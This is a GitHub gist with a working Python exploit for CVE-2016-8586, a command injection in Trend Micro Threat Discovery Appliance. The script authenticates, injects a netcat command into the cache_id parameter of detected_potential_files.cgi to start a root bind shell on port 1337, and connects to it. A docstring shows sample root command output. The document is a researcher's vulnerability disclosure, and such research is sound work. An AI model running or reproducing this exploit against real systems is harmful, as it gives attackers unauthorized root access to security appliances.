Created
April 11, 2017 07:45
-
-
Save malerisch/97c160aa4e8219c7c9ad25107444a280 to your computer and use it in GitHub Desktop.
CVE-2016-8586 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 detected_potential_files.cgi Command Injection Remote Code Execution Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/local/bin/python | |
""" | |
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 detected_potential_files.cgi Remote Code Execution Vulnerability | |
Found by: Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ & Steven Seeley of Source Incite | |
File: TDA_InstallationCD.2.6.1062r1.en_US.iso | |
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9 | |
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 | |
Summary: | |
======== | |
There exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root. | |
Notes: | |
====== | |
- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was | |
exec a bind shell using netcat. | |
- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts... | |
Example: | |
======== | |
saturn:trend_micro_threat_discovery_detected_potential_files_rce mr_me$ ./poc.py | |
(+) usage: ./poc.py <target> <pass> | |
(+) eg: ./poc.py 172.16.175.123 admin123 | |
saturn:trend_micro_threat_discovery_detected_potential_files_rce mr_me$ ./poc.py 172.16.175.123 admin | |
(+) logged in... | |
(+) starting backdoor, this will take a few secs... | |
(+) calling backdoor! | |
id | |
uid=0(root) gid=0(root) | |
uname -a | |
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown | |
pwd | |
/opt/TrendMicro/MinorityReport/www/cgi-bin | |
exit | |
""" | |
import re | |
import os | |
import sys | |
import time | |
import requests | |
import threading | |
requests.packages.urllib3.disable_warnings() | |
if len(sys.argv) != 3: | |
print "(+) usage: %s <target> <pass>" % sys.argv[0] | |
print "(+) eg: %s 172.16.175.123 admin123" % sys.argv[0] | |
sys.exit(-1) | |
t = sys.argv[1] | |
p = sys.argv[2] | |
bu = "https://%s/" % t | |
l_url = "%scgi-bin/logon.cgi" % bu | |
e_url = "%scgi-bin/detected_potential_files.cgi" % bu | |
s = requests.Session() | |
def exec_bd(s, e_url): | |
# now we setup our backdoor | |
# no reverse, since it seems to fail !? | |
netcat = "|`nc -e /bin/sh -lp 1337`" | |
e_url += "?act=search&cache_id=%s" % netcat | |
s.get(e_url, verify=False, proxies={"http":"https://127.0.0.1:8081/"}) | |
# first we login... | |
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False) | |
if "frame.cgi" in r.text: | |
print "(+) logged in..." | |
thread = threading.Thread(target=exec_bd, args=(s, e_url,)) | |
thread.start() | |
print "(+) starting backdoor, this will take a few secs..." | |
time.sleep(4) | |
print "(+) calling backdoor!" | |
os.system("nc %s 1337" % t) | |
else: | |
print "(-) login failed" | |
sys.exit(-1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment